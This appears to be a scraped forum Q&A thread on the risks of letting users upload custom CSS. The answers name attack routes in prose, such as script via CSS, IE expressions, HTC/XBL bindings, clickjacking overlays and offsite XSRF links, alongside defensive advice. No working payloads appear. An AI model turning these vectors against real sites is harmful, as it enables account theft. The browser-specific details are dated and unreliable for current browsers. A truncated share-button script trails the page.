I have a web application where I would like to allow end users to customise the look of the web site by uploading their own css file.
Are there any security issues with this? I can't see anything obvious but thought I'd ask in case there was anything I'd missed.
Javascript can be executed in CSS, you have to make sure that you are using some filtering.
I have also seen incidents where someone has covered the entire page on a microsoft controlled site with a transparent pixel, linking to a malicious site. Clicking anywhere triggered the attackers site to appear.
This could however be safe if the user only sees his or her own CSS, and they would have no way of someone else viewing what they have done. Otherwise some sort of whitelist or markdown would work.
Short answer: no it isn't. HTC in IE and XBL in Mozilla are both potential attack vectors. A hack of this nature was used to steal 30,000 MySpace passwords a while back.
Source: Simon Willison, Web Security Horror Stories
I wouldn't do it because CSS can show an image that could exploit some OS vulnerability in example.
Regards.
Depending on your server and configurations, it may be possible to run server-side code from a CSS file (though, this isn't default behavior on servers I know).
Short answer: no. First bad things that come to mind are MSIE expressions.
If these CSS files are available to all site users, and not just the person who uploaded, then there's a possible XSRF vector - you could include links to offsite resources in the CSS which perform "undesirable" effects to the user requesting them.
You may get customer support overhead if a user with his custom CSS screws the screen to that extent that he won't find the controls to reset it back. In which case you as admin will need to do it manually.
For that case a possible solution. Arrange for a specific Url to reset the style. Something like:
http://mysite.com/users/234234/reset
And advice to the user when he's about to modify the style to remember this Url and just follow it if things have gone out of control. When hit, the custom styles will be deactivated.
{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://img.manongdao.com/sparkler-677774__340.jpg', '推荐 仙女界的扛把子 的文章《Is it safe to allow users to edit css?》','https://www.manongdao.com/article-963614.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}